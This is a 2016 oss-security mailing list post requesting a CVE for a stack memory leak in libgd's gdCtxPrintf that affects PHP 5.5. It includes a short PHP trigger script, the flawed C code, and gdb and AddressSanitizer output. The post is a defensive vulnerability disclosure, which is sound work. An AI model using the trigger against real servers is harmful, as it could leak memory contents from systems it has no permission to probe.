Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sun, 29 May 2016 12:43:34 -0500
From: Fernando Muñoz <>
Subject: CVE Request: libgd - gdCtxPrintf memory leak

libgd report:

PHP report: - password 18c90f75


Credit: Fernando Muñoz and Marcelo Echeverria

While creating an XBM image (imagexbm) with an user supplied name,
libgd isn't checking the vsnprintf return value and PHP 5.5 will trust
this length and read more memory than it should, causing a read-out-of
boundaries, leaking stack memory.

vsnprintf man: "a return value of size or more means that the output
was truncated".

PHP devs marked it as a "not a bug" because the bundled version of
libgd with PHP 5.5 is not vulnerable, however using PHP with
systemwide libgd is a common practice. PHP 5.6 and PHP 7 are not
vulnerable to this issue because another bugfix prevents this from
being exploited [1].

Test script (PHP 5.5 and systemwide libgd):
$var1=imagecreatetruecolor ( 2 , 2);
$var2=str_repeat("ABCD", 1030);
imagexbm($var1, $var2, 0);

Affected code:
/* {{{ gdCtxPrintf */
static void gdCtxPrintf(gdIOCtx * out, const char *format, ...)
    char buf[4096];
    int len;
    va_list args;

    va_start(args, format);
    len = vsnprintf(buf, sizeof(buf)-1, format, args);
     // -----> if len > 4096 data was truncated
     // -----> but libgd returns this value as is
    out->putBuf(out, buf, len);

(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user/php/php-55/sapi/cli/php -n
-dextension=/home/user/php/php-55/modules/ /home/user/img.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/".

Breakpoint 1, _php_image_output_putbuf (ctx=0xb46ddf38,
buf=0xbfffa69c, l=8017) at /home/user/php/php-55/ext/gd/gd_ctx.c:39
39              return php_write((void *)buf, l TSRMLS_CC);
(gdb) print l
$7 = 8017

PHP will use 8017 as string length.

#define ABCD... <random stuff from memory> ...
ERROR: AddressSanitizer: stack-buffer-underflow on address
0xbfffb750 at pc 0xb7aa6dbd bp 0xbfffa408 sp 0xbfff9fdc
READ of size 8017 at 0xbfffb750 thread T0
                                       #0 0xb7aa6dbc
    #1 0x99388cf in sapi_cli_single_write


Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.